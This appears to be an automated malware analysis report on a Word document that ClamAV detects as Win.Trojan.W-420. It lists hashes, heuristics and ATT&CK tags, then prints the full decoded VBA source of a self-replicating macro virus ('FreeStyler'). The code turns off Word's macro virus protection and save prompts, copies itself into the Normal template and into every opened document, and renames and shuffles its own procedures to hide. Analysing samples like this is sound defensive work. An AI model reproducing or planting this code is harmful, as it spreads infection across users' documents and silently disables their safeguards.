Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9d87078fd8b68ebd…

MALICIOUS

Office (OLE)

30.5 KB Created: 2000-09-12 01:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 6b51a517c372f57e5c6d2ad186a6f3da SHA-1: ea9e73ae0226f03ca3c0213287701b049a7930fa SHA-256: 9d87078fd8b68ebdae62f5d46a5a6c35c61ea8d88cf7780dc687ce1a58b47161
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Win.Trojan.W-420. It contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code automatically when the document is opened. The macros appear to be designed to manipulate the document and potentially download or execute further payloads.

Heuristics 3

  • ClamAV: Win.Trojan.W-420 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.W-420
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12270 bytes
SHA-256: d94b056be9ba87c01f2d6ad826a37934d80f327bcf5f6d804f8a94ae4d454019
Detection
ClamAV: Win.Trojan.W-420
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FreeStyler"
Attribute VB_Base = "1Normal.FreeStyler"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
        Sub View()
        Document_New
        End Sub
Private Sub Document_Close()
On Error Resume Next
If ActiveDocument.Name = ActiveDocument.FullName Then Document_New: End
If ActiveDocument.Saved = True Then Call Document_Open Else End
End Sub
        Sub Macro()
        Document_New
        End Sub
Private Sub Document_Open()
On Error Resume Next
Application.EnableCancelKey = 0: Application.ShowVisualBasicEditor = 0
Options.VirusProtection = 0: Options.SaveNormalPrompt = 0
ActiveDocument.ReadOnlyRecommended = 0: Application.ScreenUpdating = 0
Document_New
If ActiveDocument.ReadOnly = 1 Then
SetAttr ActiveDocument.FullName, 0
ActiveDocument.Reload
End If
If NormalTemplate.VBProject.VBComponents.Item(1).Name = "FreeStyler" Then DOT = True
If ActiveDocument.VBProject.VBComponents.Item(1).Name = "FreeStyler" Then DOC = True
If DOT = True And DOC = True Then GoTo 1
If DOT = False Then
Set Acti = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
m = Acti.CodeModule.ProcBodyLine("Macro", vbext_ProcKind)
Acti.CodeModule.replaceline m, "        Sub ToolsMacro()"
a = Acti.CodeModule.ProcBodyLine("View", vbext_ProcKind)
Acti.CodeModule.replaceline a, "        Sub ViewVBcode()"
VV = Acti.CodeModule.Lines(1, FreeStyler.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule: .DeleteLines 1, .CountOfLines: .AddFromString VV: End With
NormalTemplate.VBProject.VBComponents.Item(1).Name = "FreeStyler"
m = Acti.CodeModule.ProcBodyLine("ToolsMacro", vbext_ProcKind)
Acti.CodeModule.replaceline m, "        Sub Macro()"
a = Acti.CodeModule.ProcBodyLine("ViewVBcode", vbext_ProcKind)
Acti.CodeModule.replaceline a, "        Sub View()"
End If
If DOC = False Then
Set Norma = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
m = Norma.ProcBodyLine("ToolsMacro", vbext_ProcKind)
Norma.replaceline m, "        Sub Macro()"
a = Norma.ProcBodyLine("ViewVBcode", vbext_ProcKind)
Norma.replaceline a, "        Sub View()"
CC = FreeStyler.VBProject.VBComponents.Item(1).CodeModule.Lines(1, FreeStyler.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule: .DeleteLines 1, .CountOfLines: .AddFromString CC: End With
ActiveDocument.VBProject.VBComponents.Item(1).Name = "FreeStyler"
m = Norma.ProcBodyLine("Macro", vbext_ProcKind)
Norma.replaceline m, "        Sub ToolsMacro()"
a = Norma.ProcBodyLine("View", vbext_ProcKind)
Norma.replaceline a, "        Sub ViewVBcode()"
Document_New
End If
If ActiveDocument.FullName = wdOpenFormatDocument Then ActiveDocument.SaveAs ActiveDocument.FullName
1: ActiveDocument.Saved = True
End Sub
Private Sub Document_New()
On Error Resume Next
'VOVAN//SMF
Application.EnableCancelKey = 0: Application.ShowVisualBasicEditor = 0
B = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1)
C = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
xxx = Mid(B, 13): fff = Len(xxx) - 2: hhh = Left(xxx, fff)
Number = MacroContainer.VBProject.VBComponents(1).CodeModule.ProcCountLines(hhh, vbext_pk_Proc)
VV = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, Number)
With MacroContainer.VBProject.VBComponents.Item(1).CodeModule
.DeleteLines 1, Number
.InsertLines C, VV
End With
End Sub

' Processing file: /opt/analyzer/scan_staging/332e618126924580b42df98b2a8cc0f4.bin
' ===============================================================================
' Module streams:
' Macros/VBA/FreeStyler - 5211 bytes
' Line #0:
' 	FuncDefn (Sub View())
' Line #1:
' 	ArgsCall Document_New 0x0000 
' Line #2:
' 	EndSub 
' Line #3:
' 	FuncDefn (Private Sub Document_Close())
' Line #4:
' 	OnError (Resume Next) 
' Line #5:
' 	Ld ActiveDocument 
' 	MemLd New 
' 	Ld ActiveDo
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.